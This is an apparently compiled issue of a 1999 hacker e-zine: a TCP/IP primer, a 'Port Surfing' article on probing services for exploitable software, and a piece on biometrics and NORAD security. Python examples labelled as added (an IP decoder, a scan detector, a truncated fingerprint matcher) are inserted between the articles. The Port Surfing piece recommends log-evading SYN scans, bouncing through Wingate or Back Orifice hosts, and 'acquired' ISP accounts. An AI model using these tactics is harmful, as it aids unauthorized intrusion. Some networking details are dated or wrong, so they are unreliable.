On its way to becoming a standard, a protocol passes through different stages. The protocol starts as a Proposed Standard. It may be promoted to a Draft Standard, and finally to a full-fledged Standard, an official standard protocol for the Internet. At each stage, the protocol faces review, debate, implementation, and testing. Proposed Standards, for example, go through at least six months of review before they may be promoted to a Draft Standard. In general, promoting a standard requires two independent implementations of the protocol.

Obviously this process would break down if no one actually monitored it and made decisions when required. The body that takes care of this for the TCP/IP protocols is the Internet Activities Board (IAB). The IAB coordinates design, engineering, and management of the Internet. The IAB has two task forces: the Internet Engineering Task Force (IETF) and the Internet Research Task Force (IRTF).
Unlike other groups, the IAB is made up of volunteers rather than the government, the DoD, or a commercial vendor. Two organizations work with the IAB: the Federal Networking Council and the Internet Society. The Federal Networking Council represents all agencies of the United States federal government involved with the Internet. The Internet Society is a public organization that takes its membership from the entire Internet community. Both organizations provide input on Internet policy and standards.

The IETF is responsible for specifying the Internet protocols and architecture. By its own description, the IETF is not a traditional standards organization, although many of the specifications it produces become standards. The IETF is made up of volunteers who meet three times a year to fulfill the IETF mandate. The IETF has no membership; anyone may register for and attend meetings. The work of the IETF is organized into various areas that change over time. The one consistent factor is the IETF's role as the testing and implementation arm for TCP/IP growth and development.

In recent years, new technologies have appeared rapidly on the Internet. A case in point is the World Wide Web, which depends on the HyperText Transfer Protocol (HTTP). The web and HTTP were in wide use long before RFC 1945 established an Internet standard for HTTP version 1.0. Increasingly, evolution of the Internet is being led by network heavy hitters such as Microsoft and Netscape. The slow standards process fails to satisfy vendors who want to establish themselves as leaders on the Net.

The only other serious work that has been done comes from the International Standards Organization in the form of Open Systems Interconnection (OSI). OSI is another set of protocols that provides similar functionality to TCP/IP. It was widely assumed that they would replace TCP/IP as the open protocol solution, but this has not come to pass.
One obstacle with the OSI protocols is the fact that they are governed by international bodies, which sometimes slows down the development process.

------
A Few Services and Protocols Associated with TCP/IP:

Telnet - A remote terminal emulation protocol that enables clients to log on to remote hosts on the network.

FTP - A file transfer application that enables users to transfer files between hosts. Stands for the File Transfer Protocol.

SNMP - Used to remotely manage network devices. Stands for the Simple Network Management Protocol.

DNS - Provides meaningful names like achilles.mycorp.com for computers to replace numerical addresses like 123.23.32.23. Stands for the Domain Name System.

HTTP - This protocol, the core of the World Wide Web, facilitates retrieval and transfer of documents. Stands for the HyperText Transfer Protocol.
------

To make TCP/IP work, each and every device on a TCP/IP network requires a unique address. An IP address identifies the device to all the other devices on the network. IP addresses are made up of two parts. The first part of an IP address identifies your network ID. With the Internet spanning the entire globe, every network or part of a network must have a unique ID. This ID is used to route the information being sent to the correct network. The other part of your IP address is the host ID, a unique number that identifies each computer and device on your network that talks using TCP/IP.

A TCP/IP address is, simply put, a 32-bit binary number. Looking at an address as 32 zeros or ones is difficult for humans, so we view the address in dotted decimal form, in the following format: 198.53.147.153. Each of the four numbers represents 8 bits of the address and is referred to as an octet.

Three main classes of addresses exist: Classes A, B, and C. The most obvious difference between the three main types of addresses is the number of octets used to identify the network ID.
Class A uses the first octet only; this leaves 24 bits (or three octets) to identify the host. Class B uses the first two octets to identify the network, leaving 16 bits (two octets) for the host. Class C uses three octets for the network ID, leaving 8 bits (one octet) for the host.

Class A: 72.0.0.0
Class B: 112.34.0.0
Class C: 198.173.202.0

A couple of rules determine what you can and cannot use for addresses. Neither the network ID nor the host ID can be all 0's or all 1's, because each of these conditions has a special meaning. Knowing that the first octet represents the first 8 bits of the address, and knowing the starting bits for the classes of addresses, you can see the first octet ranges for the respective classes in the table below. Note that Class A does not start with 00000000, since that network ID has a special meaning, and does not end with 01111111 (decimal 127), since that is reserved for loopback.

Because Class A addresses use only the first octet to identify the network ID, there are a limited number of them (126; 127 is reserved). Each of these 126 networks, however, can have many hosts on it: 2 to the 24th power (the remaining 24 bits) minus two (the host IDs that are all 0's and all 1's) equals 16,777,214 hosts on a single network.

Class B addresses use the first two octets. The first 2 bits, however, are set to binary 10. This leaves 14 bits that can be used to identify the network (6 bits in the first octet and 8 from the second): 2 to the 14th possible combinations, or 16,384 network IDs. (Because the first two bits are 10, you don't have to worry about an all 0's or all 1's network ID.) Each of those network IDs has 16 bits left to identify the host, or 65,534 hosts (2 to the 16th minus 2).

Class C networks use three octets (or 24 bits) to identify the network. The first three bits, however, are always 110.
This means that there are five bits in the first octet and eight in each of the other two that can be used to uniquely identify the network ID, or 2 to the 21st possible networks (2,097,152), each of which has 8 bits for hosts, or 254 hosts (2 to the 8th minus 2).

The TCP/IP model for networking has only four layers, each of which covers more functions than a layer of the OSI model. They are: Application, Transport, Internet, and Network Access.

The Application layer in TCP/IP combines the functions of both the Application and Presentation layers in the OSI model. The Application layer contains various services (protocols) such as NNTP (Network News Transfer Protocol) or SMTP (Simple Mail Transfer Protocol). The WinSock API is also in the Application layer.

Just as in the OSI model, the Transport layer is the actual language of the network. All requests use one of two different transport protocols, either TCP (Transmission Control Protocol) or UDP (User Datagram Protocol).

The TCP/IP Internet layer replaces the Network layer in the OSI model. It deals not only with finding other hosts (computers) on the same network, but with routing information (in the form of packets) to other networks.

The TCP/IP Network Access layer replaces the Data Link layer. This layer handles framing the data and transmitting it to the wire.

TCP/IP does not use computer names in its communications. Rather, it uses the IP address of the host as the destination for the packet it will send. This means that some method of turning \\comp1 (a NetBIOS computer name) or www.microsoft.com (a host name) into an IP address must exist. Otherwise you would have to memorize many different IP addresses.

Many different protocols can be located at the Application layer. All the TCP/IP protocols (applications) and the NetBIOS services, however, rely on the services of two main APIs: WinSock and NetBIOS over TCP/IP (NBT).
Windows Sockets (WinSock) provides socket-oriented services to the TCP/IP utilities that can exist at the Application layer, and also provides services to NetBIOS. A socket combines a computer's host address with a port number designating a service or application running on the computer. The port numbers serve as end points for communication between the hosts. The port numbers are not normally the same on both ends; services usually use well-defined and well-known port numbers. These well-defined port numbers are controlled and assigned by the Internet Assigned Numbers Authority. When you start a service on your system, the service registers its assigned port number in the system, and anything that comes in for that port is sent to that service.

Using port numbers allows the WinSock interface and all the underlying layers to ignore what the information is and to just move it from point to point. Included in the information is the address, transport layer protocol (UDP or TCP), and port number that sent the information; this enables the application to respond directly to that client running on the remote system. The first 1,024 ports are reserved and are used only for services. Any port number up to 65,536, however, is valid.

To look at the whole process: the service starts on the server and registers its port number (thereby monitoring that port, as shown here). On the other host, the client side application starts. It also registers a port number that it will use (any available port above 1023). The client application can now start to send information to the server by sending to the IP address, transport protocol, and port number. The server then responds to the IP address, protocol, and port number from which it received the information. In this way, there is no reliance on computer names or other upper-level information and absolutely no restriction on which port any particular service can use.
Windows NT uses NetBIOS when you work with its redirector and server services (the base Application layer components of Microsoft networking). This means that it requires the underlying protocol to handle requests in the form of NetBIOS commands. You have just seen that the TCP/IP stack does not use names, nor does it register each service with a name/number combination. On the surface, this would seem to indicate that NT cannot use TCP/IP as a protocol; but it does. To do this, another layer has to be brought in that maps (or translates) the NetBIOS command into a series of TCP/IP port numbers. This enables NetBIOS to have a port for transmitting and receiving data, establishing and releasing sessions, and handling NetBIOS names, all over TCP/IP. Not surprisingly, the component that handles this function is called NBT, or NetBIOS over TCP/IP. It is responsible for the mapping of, and communications between, the NetBIOS interface and the various WinSock ports. This means that all communications over TCP/IP must go through the WinSock interface. NBT has also been referred to as NetBT.

WinSock has to rely on the Transport layer to deal with data moving to and from it. This is handled by the two Transport layer protocols: TCP and UDP. Computers can have different types of conversations with each other. UDP (User Datagram Protocol) provides no guarantee that the packets will get through. TCP (Transmission Control Protocol), on the other hand, creates a session, and can then guarantee delivery.

TCP is used to provide a connection-oriented delivery service for the higher-level protocols. To do this, TCP must first establish a session with the remote communicating host. It does this by means of a three-way handshake. First the host initiating the communications sends a packet to the other host that contains information about itself and a SYN (synchronize) flag telling the other host that a session is requested.
The other host receives this packet and responds with information about itself, the SYN flag, and an ACK (acknowledgment) of the information that it received. Finally the first host ACKs the information it received from the other, and a session now exists between the two systems. At the end of the communication session, a similar three-way handshake is used to drop the session with the remote host. This ensures that both of the hosts are through transmitting, and closes the session cleanly.

Compared to TCP, UDP is simple: the data from the upper-layer protocol is encapsulated and sent. UDP is used to send and receive simple messages; no session is required. The UDP protocol is used, for example, to send and receive broadcast messages.

The Internet layer has four main protocols. These protocols work together to provide a best-effort delivery service (guarantees are the responsibility of TCP or higher-level applications). IP (Internet Protocol) needs only to know which IP address to send the data to and the protocol on the other system (TCP or UDP) that should receive it. All devices that use TCP/IP have an Internet layer; this includes the routers that provide the backbone for communications across the network. IP is responsible for taking the packet and determining whether the packet is for the local network. If not, IP must find a route for the packet to the destination network and eventually the destination host.

To understand how IP determines whether a host is on the local network, you must look at the subnet mask and what its function is. As you saw earlier, the IP address that each host has is a combination of the network ID and the host ID. The address itself is 32 bits long. A varying number of bits are used to identify the network and the host. The discussion here keeps the subnetting simple and works with the standard subnet masks. In a later unit, you will look at using custom subnetting and supernetting.
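The classful rules from the address section earlier (leading bits, standard masks, the 126/16,384/2,097,152 network counts and the "2 to the n minus 2" host counts) and the standard subnet mask just introduced, worked through in Python. This is an added example, not from Digital Avatar's article; the first-octet ranges it reports are derived from the leading-bit patterns the article gives, since the table the article refers to is not reproduced here, and 172.16.4.9 is a constructed sample address.

```python
"""Classful IPv4 decoding with a logical AND on the standard mask (added example)."""

# class -> (standard mask, leading-bit pattern, number of leading bits)
CLASS_RULES = {
    "A": (0xFF000000, 0b0, 1),    # 0xxxxxxx
    "B": (0xFFFF0000, 0b10, 2),   # 10xxxxxx
    "C": (0xFFFFFF00, 0b110, 3),  # 110xxxxx
}
MASK32 = 0xFFFFFFFF


def parse_ipv4(text: str) -> int:
    """Dotted decimal -> 32-bit integer; rejects anything but four octets 0..255."""
    parts = text.strip().split(".")
    if len(parts) != 4:
        raise ValueError(f"not dotted decimal: {text!r}")
    value = 0
    for part in parts:
        octet = int(part)
        if not 0 <= octet <= 255:
            raise ValueError(f"octet out of range in {text!r}")
        value = (value << 8) | octet
    return value


def to_dotted(value: int) -> str:
    return ".".join(str((value >> shift) & 0xFF) for shift in (24, 16, 8, 0))


def address_class(value: int) -> str:
    """Class from the leading bits of the first octet; D is multicast, E reserved."""
    first = value >> 24
    for cls, (_, pattern, nbits) in CLASS_RULES.items():
        if first >> (8 - nbits) == pattern:
            return cls
    return "D" if first >> 4 == 0b1110 else "E"


def first_octet_range(cls: str) -> tuple:
    """First-octet range implied by the leading bits (the table the article refers to).
    Class A excludes 0 (all-zero network) and 127 (loopback), as the article notes."""
    _, pattern, nbits = CLASS_RULES[cls]
    low = pattern << (8 - nbits)
    high = low | ((1 << (8 - nbits)) - 1)
    return (1, 126) if cls == "A" else (low, high)


def split_address(text: str) -> dict:
    """Split a host address into network ID and host ID with a logical AND."""
    value = parse_ipv4(text)
    cls = address_class(value)
    if cls not in CLASS_RULES:
        raise ValueError(f"{text} is class {cls}, not a valid host address")
    mask, _, nbits = CLASS_RULES[cls]
    network = value & mask             # the AND with the standard mask
    host = value & (~mask & MASK32)    # the bits the mask leaves for the host
    host_bits = 32 - bin(mask).count("1")
    network_bits = 32 - host_bits - nbits
    network_count = (1 << network_bits) - (2 if cls == "A" else 0)  # A loses 0 and 127
    all_ones = (1 << host_bits) - 1
    return {
        "class": cls,
        "mask": to_dotted(mask),
        "network_id": to_dotted(network),
        "host_id": host,
        "networks_in_class": network_count,
        "hosts_per_network": (1 << host_bits) - 2,
        "valid_host": host not in (0, all_ones) and (value >> 24) != 127,
    }


def on_same_network(a: str, b: str) -> bool:
    """IP's local-or-remote decision: AND both addresses with a's standard mask."""
    mask = CLASS_RULES[address_class(parse_ipv4(a))][0]
    return parse_ipv4(a) & mask == parse_ipv4(b) & mask


if __name__ == "__main__":
    for addr in ("72.0.0.1", "172.16.4.9", "198.53.147.153", "127.0.0.1", "224.0.0.1"):
        try:
            print(addr, split_address(addr))
        except ValueError as err:
            print(addr, "->", err)
    print(on_same_network("198.53.147.153", "198.53.147.1"))
```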
A logical AND enables you to compare two binary numbers and come up with a third that describes the state of the other two. What makes it important is that you can use it with subnet masks to split an IP address into a network ID and a host ID.

Address Resolution Protocol (ARP) is now used to determine the physical address of the destination host. The physical or MAC (Media Access Control) address is used by network adapter cards to communicate with other network adapter cards on the local network. If the destination host is on a remote network, the MAC address of the router is used. So ARP, using either its cache of resolved addresses or a broadcast, finds the MAC address to send the packet to. In the case of a local machine, this is the actual machine. In the case of a remote system, it is the router. Remember that the router also has an IP layer and so it has ARP. The router finds the MAC address of the host (or another router) on the other network. You never receive the information about the other host's MAC address; it would be pointless. After ARP has the address, IP sends the packet to that address.

Sometimes, however, when talking to hosts on other networks, your packet will have problems. When this happens, you receive notification. ICMP is a diagnostics and messaging protocol used in the TCP/IP stack to enable communications to continue. ICMP handles such routine functions as PING. It also handles important issues such as reporting unreachable networks.

When you are considering a network that spans the globe, you have to expect that problems connecting with specific hosts will sometimes arise. A few protocols now in place help to prevent this. Dynamic Routing is one that provides alternative routes if a link goes down. Since it may take a long time to try a lot of alternative routes, a time out value is given to each packet on the Internet. The time out represents the maximum number of hops that a packet can make.
By default in Windows NT 4.0, the Time To Live, or TTL, is 128 seconds. Each router decrements the TTL by one for every second that the packet is in the router. If the TTL expires or there is no route to the network you are trying to reach, you receive an ICMP message (request timed out or destination host unreachable). This prevents packets from circulating around the Internet forever, using up bandwidth trying to find a route that may not exist.

ICMP also works to manage the flow of data on the Internet by directing traffic. If your router becomes overloaded, for example, and is unable to keep up, it might send a source quench message to your system. This tells your system to stop sending for a while. Routers also send an ICMP message if they detect that a better route to your destination is available. This would be an ICMP redirect message, telling your system to use another router.

IGMP is the last of the protocols that reside in the lower layers of the TCP/IP stack. IGMP handles sending and receiving when groups of computers are involved. Sending to groups of computers is used to provide the systems that receive the information with a live feed. This is multicasting, where you get a straight pipe of data. In multicasting, you send the information from your system to a special IP address (a Class D address). You should remember that there are Class A, B, and C addresses. Class D, however, is only mentioned here; it is not valid as a host IP address. When a system multicasts, it chooses an IP address (this has to be unique on the network) and sends all the information to that address. If you want to receive the information, you must tell your system to listen for that address. The problem is that your router does not know that it should listen for that address, and the packets don't get into your network. IGMP tells your router that you wish to listen to that address, enabling you to receive multicasts.
Just as in the OSI model, the Network Access layer is responsible for framing packets of information for the underlying topology and transmitting the data on the wire. The Network Access layer also grabs the frames off the network. If they are for that MAC address or for broadcast/multicast, the Network Access layer passes them up to the appropriate protocol.

There. Hope you have a little more background on the protocols and services out there.

Peace|Out.
-----
: Digital Avatar :
: lambesis@gmx.net :
: http://damatrix.cjb.net :

::::::::::::::::::::::::::::::::::::::::::::::::::::::::May/99 :::
The Discordant Opposition Journal ::: Issue 5 - File 6 :::
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

:The Ancient Art of Port Surfing:
cronus

You Wha ?

What, you might ask, the fuck is Port Surfing ? And that would be a very good question. As you might have guessed from previous articles from me, I like to think myself a bit of a hacker, thus we can conclude that Port Surfing is of grave importance to the humble hacker. Port Surfing is the art of moving your attention from one port to another on a certain system, gaining as much information as possible, with the ultimate goal of finding software that is exploitable.

Hows tha then ?

The most basic tool for Port Surfing is the portscanner. A portscanner is a piece of code or script that scans a range of port numbers on a certain system looking for open services. Portscanners are easily coded, containing no more than a little code to connect to sequential ports and log the results. Since portscanning is such an easy operation, you may ask why then I am rabbiting on about Port Surfing... Port Surfing is an intimate and personal action that has the effect of getting you closer to the system under inspection.

The principle first off... A portscan can only tell you what ports are actually open and running services. It would take a lot of programming to create a Port Surfer.
Port Surfing involves sending commands at the open service, noting its version and program information, and even trying to use the service manually to get a feel for it. Remember that for each service (mail, web server, etc.) there are dozens of variants and upgrades. Each variant and upgrade has specific flaws and weaknesses. It is the art of Port Surfing that makes these flaws apparent.

Who me ?

It's necessary, as in most hacking techniques, to hide your presence and activity. The simple act of portscanning a server CAN put its defenses on guard and force it to reject ALL your further incoming connections. Portscanning can just be a loop that attempts to connect to a port number, logs whether it can, then moves to the next port. But all these connections will be logged in the system logs, so on later inspection your attention will be noticed. The answer is the SYN scan. The TCP three-way handshake consists of an initial packet from your computer, a reply from the server and a final packet from you; the connection is then open. A program could be made that simply started the connection routine but didn't actually send the final packet. This would still have the result of discovering if the port is open, without leaving a trace of the connection in the logs.

Once you physically intend to connect to the port, you should take some small efforts at hiding your presence. Hiding your real connection is also part of Port Surfing. All of the basic ideas of bouncing your connection are applicable: bouncing off vulnerable Wingate systems, setting up 'Back Orifice' redirects or even just using an 'acquired' ISP account. I have also done an article on this whole topic for this issue; read that for a more detailed look.

Vers and stuff...

Connecting to the port number will most likely give you a text output something along the lines of "SSH ver 1.2" or "HTTP/1.2". The basic introductory text is unnecessary; it is merely advertising for a specific piece of software.
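The "Who me ?" section's point that every connect attempt ends up in the system logs is exactly what a defender relies on; the half-open SYN scan it describes never reaches an application log, but a firewall or packet-level log still records the SYN itself. The following Python detector is an added example, not from cronus's article; it runs over constructed firewall-style log lines (a line format assumed for this example) and reports a source that touches many distinct ports on one host within a short window, noting whether it only ever sent SYNs.

```python
"""Port-scan detection over packet-level log lines (added example).

Log format is assumed for this example:
    <ISO timestamp> src=<ip> dst=<ip> dport=<port> flags=<tcp flags>
A source that reaches DISTINCT_PORTS different ports on one host within
WINDOW_SECONDS is reported. A half-open (SYN-only) scan never completes
the handshake, so application logs will not show it; a firewall or
sniffer log that records the SYN is what makes this detection work.
"""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta
from typing import NamedTuple

LINE_RE = re.compile(
    r"^(?P<ts>\S+) src=(?P<src>[\d.]+) dst=(?P<dst>[\d.]+) "
    r"dport=(?P<dport>\d+) flags=(?P<flags>[A-Z]+)$")

DISTINCT_PORTS = 10   # assumption: thresholds to tune per environment
WINDOW_SECONDS = 60


class Event(NamedTuple):
    ts: datetime
    src: str
    dst: str
    dport: int
    flags: str


def parse_line(line: str):
    """Return an Event, or None for lines that do not match the assumed format."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    return Event(datetime.fromisoformat(m["ts"]), m["src"], m["dst"],
                 int(m["dport"]), m["flags"])


def detect_scans(lines, distinct_ports=DISTINCT_PORTS, window_seconds=WINDOW_SECONDS) -> dict:
    """Sliding-window count of distinct destination ports per (src, dst) pair.

    Returns {(src, dst): {"first": ts, "distinct_ports": n, "syn_only": bool}}
    for every pair that crossed the threshold (recorded at the first crossing).
    """
    window = timedelta(seconds=window_seconds)
    recent = defaultdict(deque)   # (src, dst) -> events still inside the window
    alerts = {}
    events = [e for e in map(parse_line, lines) if e is not None]
    for ev in sorted(events, key=lambda e: e.ts):
        key = (ev.src, ev.dst)
        q = recent[key]
        q.append(ev)
        while ev.ts - q[0].ts > window:   # expire events older than the window
            q.popleft()
        ports = {e.dport for e in q}
        if len(ports) >= distinct_ports and key not in alerts:
            alerts[key] = {
                "first": q[0].ts,
                "distinct_ports": len(ports),
                "syn_only": all(e.flags == "S" for e in q),
            }
    return alerts


def constructed_log() -> list:
    """Constructed sample: a SYN-only sweep of ports 1-20, a full-connect sweep of
    ports 21-35 (SYN then ACK per port), and an ordinary client using 80 and 443."""
    base = datetime(1999, 5, 12, 3, 14, 0)
    lines = []
    for i in range(20):
        t = base + timedelta(seconds=i)
        lines.append(f"{t.isoformat()} src=10.0.0.5 dst=192.0.2.10 dport={i + 1} flags=S")
    for i in range(15):
        t = base + timedelta(seconds=2 * i)
        for flags in ("S", "A"):
            lines.append(f"{t.isoformat()} src=10.0.0.9 dst=192.0.2.10 dport={21 + i} flags={flags}")
    for i in range(20):
        t = base + timedelta(seconds=3 * i)
        lines.append(f"{t.isoformat()} src=10.0.0.7 dst=192.0.2.10 dport={80 if i % 2 == 0 else 443} flags=S")
    lines.append("garbage line that should be ignored")
    return lines


if __name__ == "__main__":
    for (src, dst), info in detect_scans(constructed_log()).items():
        print(f"{src} -> {dst}: {info['distinct_ports']} ports from {info['first']}, "
              f"SYN only: {info['syn_only']}")
```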
The version of the running software is vital if weaknesses are to be found, but the problem is that these outputs can be altered to give false information. I know of a server running Qmail mail software but the port outputs the text "Sendmail 5.0.5", which is a non-existent version of the buggy sendmail daemon. Once you've received all the text information you could try to throw arbitrary commands at the server. See if you can get a list of commands and try to work out its real specifications. 'Version', 'info' or even 'help' might all retrieve information. There are no hard and fast rules at this point. This is where Port Surfing becomes an art. You must ad-lib and learn from your attempts. If you find that 'help' gives you an error message, see if the message gives any clues with which to proceed. I'm sorry I have to be so vague here, but the art of Port Surfing is not a step-by-step routine, more a hunt guided by gut feeling.

Manual (Ab)use !

If you can get a basic outline of how the service works, you might try using the service by hand. An HTTP server specifically outputs HTML-coded text that is readable by a web browser. The specification of the HTTP commands is fairly basic, easily typed and understood. I'm not going to go into the specifics of server software commands because there are literally dozens of different protocols. The sheer number of possibilities makes the idea undigestible.

I be sorry...

I realise that this article is getting less and less technical, and for that I apologise. You must see hacking as I do. In the past I have referred to it as a hunt: trying to find the prey (weakness) before it escapes (is patched). You must use gut instinct on the hunt and make decisions at the time, not beforehand. If you feel a server that you are 'probing' is somewhat sluggish and yet a ping on the server shows decent connection times, you might figure out that the server is running out of resources internally, such as CPU processes and hard drive space.
All of this detecting is an integral part of Port Surfing. You are trying to get closer to the server, to understand its workings. If you find it has peak times of connection speeds you may find that at these times the office is closed. These discoveries help you plan an attack. A traceroute command might show that for some strange reason your connections always bounce through another specific server; this kind of information would seem to point to a router at an ISP or head office. The logical conclusion would then follow that this server acts as a firewall. A firewall usually has a trust-based relationship with the protected server. This trust could possibly be exploited. Again another example of what I call theoretical hacking...

... intoxicated with the madness ...

cronus (at) iol (dot) ie
http://homepages.iol.ie/~cronus

::::::::::::::::::::::::::::::::::::::::::::::::::::::::May/99
::: The Discordant Opposition Journal ::: Issue 5 - File 7 :::
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

:Biometrics:
Infinity Matrix

A technology that virtually eliminates all kinds of fraud, biometrics is a very secure practice. It almost cannot be bypassed. But I am not here to discuss how to bypass it; I am just going to explain some of the processes, such as fingerprinting and iris/retina scans, etc.

A Look Inside NORAD ---

Just a small prelude to what's to come. It's a little look inside the security at NORAD's operations base in Colorado. Probably about 95% of the data about NORAD is classified, so my information is very limited. So anyways, here goes.

In the early 1960s, more than 690,000 tons of rock were carved out of Cheyenne Mountain to create nearly three miles of underground interconnected tunnels and caverns, with a roadway that runs east and west through the mountain.
This complex is built to withstand virtually any conceivable natural disaster, act of sabotage and war, even a multimegaton nuclear strike. Pretty amazing, huh?

At The Front Door -

The front door isn't exactly a piece of cake to get in. To enter the NORAD complex, a visitor must travel into the mountain on the main road and turn off to pass through a pair of three-foot-thick steel doors that weigh 25 tons apiece. The outer door is designed to close flush with the rock wall of the roadway, which is open at either end. The roadway thus acts to channel heat and percussion from an explosion through the mountain and away from the doors and the complex behind them. And, I doubt you would, but if you try to break in, uhm, your result: big guys with guns.

The ShockProof Structure -

Each building in the complex rests in its own granite cavern on steel springs that let the structure roll with any shockwaves that penetrate the mountain; no part of the building touches the rock. Friction dampers, like giant shock absorbers, further reduce the shaking that could result from an earthquake or a nuclear explosion. Wire mesh on the wall protects communication and power cables from rockfalls. To counter the tendency of granite to shift under its own weight, expandable bolts, ranging in length from 6 to 32 feet, are inserted into the rockface to form a compressed layer that strengthens the walls of the caverns.

================

Smart Cards ---

First and foremost, I want to talk about smart cards. These aren't exactly biometrics, but they are an advanced identification method. Smart cards are the new answer to the traditional locks and keys that limit access to sensitive areas. Why this has taken place: because keys have a way of getting stolen and/or copied. There are basically three types of smart cards. Each of these smart cards can employ an identifying number or password that is encoded into the card itself, all pretty much out of the reach of an average criminal.
Anyways, back to the three types of cards.

Magnetic Watermark - During manufacturing of the tape, magnetic particles used to encode the card's permanent identification number are set in zones of varying width at alternating 45-degree angles to the tape's longitudinal axis (up and down). Data may then be encoded on the tape, but the identifying structure of the tape itself cannot be altered or copied. A card reader with a special head and circuitry is needed to scan the watermark.

Optical Memory Card - Tiny dots representing binary ones and zeroes are either photographically etched onto the storage strip during manufacturing or burned in with a very small, low-powered laser beam. The card, which can hold the equivalent of a 400-page book on its 3 1/4 by 1/2 inch strip, is sealed with a protective layer that cannot be removed without destroying data and voiding the card.

Microchip Card - The card's penny-sized microchip contains a processor and three types of memory, totalling 21,800 bits for storing programs and data. Sensitive information, such as the cardholder's password and personal information, is kept in the so-called 'secret zone' in the card's read-only memory. This zone is encoded during manufacture, and is not accessible even to the card's owner.

================

The ManTrap

The ManTrap is a simple structure that protects from intruders by verifying the identity of users. Here is the process it uses.

1. After entering the identification booth, a user punches in a pass number on a 12-button keypad, signalling the computer to retrieve the voice template and weight record registered by the person assigned that number.

2. Through an overhead speaker, the computer broadcasts a four-word phrase randomly selected from the 16 words previously registered.

3. The user repeats the phrase into the microphone and the sounds are digitized for comparison with the record on file.

4. If the voice patterns match and the weight on the floor scale is no more than 40 pounds over the registered weight on the record, the exit door leading into the data-processing center will automatically unlock. If a user is not verified after seven tries, security is alerted. Again, big guys with guns.

================

Signatures ---

Forging a signature has become one of the most useful tools in fraud. Many people have gotten paychecks, checks and other things issued to them because they forged a signature on something. Now, you may not think this would work very well, but technology has come up with some pretty amazing stuff to make signatures a useful and easy device to test user identity, with things like acceleration sensors and pressure sensors built into the pen. I know no-one could forge mine; it looks like a major seismic event. But anyways, here is how the biometric signature-recognition pen works.

The biometric pen converts a signature into a set of three electrical signals by means of piezoelectric transducers, ceramic devices that generate measurable voltages in response to stress. A good example of these being used was in Rudy Rucker's The Hacker and the Ants, where the piezoelectric transducers were fitted into gloves used in cyberspace, and they would contract and such so that the user had a sense of touch. Even though this is complete fiction at this time, it is still a good example. One transducer senses changes in the writer's downward pressure on the penpoint; farther up the pen shaft, two transducers set at right angles to each other measure vertical and horizontal movement. Although the computer does not need a visible signature, the pen also includes an ink cartridge, because tests have shown that people sign more accurately if they see what they are writing.
Signals from the pen's sensors are translated into a trio of electrical waveforms, one representing changes in the downward pressure, the other two representing acceleration along the pen's vertical and horizontal axes. The crossing of a t, for example, would register as a high point in the horizontal and a low point in the vertical waveform, whereas the dotting of an i would produce a peak in the pressure-change wave while leaving both of the acceleration waveforms relatively flat. A curved or diagonal stroke, for its part, would create action in both sensors.

================

Voice Signatures ---

Vocal signatures have become a fad in movies, where people say things like "Hello, this is Joe Blow, my voice is my passport, verify me." (From the movie Sneakers, a very good one at that.) As you may have noticed, it is kind of easy to tape-record a person's voice, so this seems a bit easy to bypass. And here's how it works.

For purposes of analysis, the computer focuses mainly on the simplest characteristic of a voice: its acoustic strength. This changes during a spoken phrase from silence to varying degrees of loudness. To isolate personal characteristics within these fluctuations, the computer breaks the sound into its component frequencies and analyzes how they are distributed. On a spectrogram (a visual representation of the voice) the high-amplitude frequencies are indicated by bright spots called formants; their pattern is determined by the unique shape and movement of the speaker's lips, tongue, throat and vocal cords.

================

Iris/Retinal Scans ---

Each person carries something other than, but just as distinctive as, a fingerprint in the back of their eye: the fine tracery of blood vessels. This method, in my opinion, is one of (probably) the best sorts of biometric security, other than fingerprints. This system uses an infrared beam to scan the eye in a circular motion.
A detector in the eyepiece of the device measures the intensity of the light as it is reflected from different points. Because blood vessels do not absorb and reflect the same quantities of infrared as the surrounding tissue, the eyepiece sensor records the vessels as an intricate dark pattern against a lighter background. The device samples light intensity at 320 points around the path of the scan, producing a digital profile of the vessel pattern. (Only one inspection is necessary, since a person's retinal print, or retinal signature, does not change as the voice or written signature does.) The algorithm in the system's software then compresses the digital profile into a reference template. Enrollment can take as little as 30 seconds and verification can be even faster: the user types in an identification number to call up the reference template from the computer's memory and then looks into the eyepiece for a retinal scan. In only a second and a half, the computer compares the scan results with the template and grants access if the two signatures are close enough.

================

Hand Geometry ---

Kids in school trace their hands and often notice that no two are alike. This method employs a scan that maps the geometry (shape, bones, etc.) of the hand, and compares a later scan against it. A user enrolls in a hand geometry system by placing his/her hand on the metal plate of a reading device, positioning the middle and ring fingers on either side of a small peg and aligning all the fingers along narrow grooves slotted with glass. An overhead light shines down on the hand, and a sensor underneath the plate scans the fingers through the glass slots, recording light intensity from the fingertips to the webbing where the fingers join the palm.
The device measures each finger to within 1/10,000 of an inch, marking where the finger begins and ends by the varying intensities of light. The information is digitized and stored in the system as a template or coded on a magnetic-strip ID card. Despite the uniqueness of individual hands, the method is not foolproof. For example, if a user is enrolled in the system wearing heavy nail polish, the sensor would not detect the true ends of the fingertips, which would be hidden by the dark nails. The computer would thus be unable to verify the person's identity if she tried to gain access after removing the nail polish.

================

FingerPrinting ---

Fingerprint identification is based on the anatomical truth that no two fingerprints are the same; each has a unique pattern of figures, such as loops, whorls and arches. But this can easily be fooled. If there is a scrape, or some kind of dirt or smudge, the computer cannot properly identify the print.

At enrollment, data samples from a scan of the user's fingerprint are interpreted as varying degrees of gray and assigned a numerical value. This gray-scale representation is processed by a complex algorithm, which pays special attention to the places where clusters of light and dark points indicate that a ridge has divided or ended. The system is designed to analyze these minute ridge splits and endings, ascertaining their positions relative to the core of the print and to one another; the system also analyzes the angles of the ridges. These relationships remain unaltered even when a print's impression is faint, dirty or distorted. Several readings are taken and manipulated by the algorithm to create a stored template. A user wishing to gain access to a secure area merely enters an identification number to call up a template, places the same finger in the scanner and waits a few seconds for a verification analysis. If the prints are a close enough match, access is granted.
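The enrollment and verification steps just described, with ridge endings and bifurcations stored relative to the core and compared by position and ridge angle, as an added example that is not the article's or any vendor's code. The minutiae sets are constructed, and the small rotation search goes slightly beyond the text, which mentions only positions and angles; it also shows the faint-print case the article warns about, where a genuine user is rejected.

```python
"""Simplified minutiae fingerprint verification (constructed data)."""
import math
from dataclasses import dataclass


@dataclass(frozen=True)
class Minutia:
    x: float       # position relative to the print's core
    y: float
    angle: float   # ridge direction, degrees in [0, 360)
    kind: str      # 'end' (ridge ending) or 'bif' (ridge bifurcation)


def rotate(m, degrees):
    """Rotate a minutia about the core (the origin) by `degrees`."""
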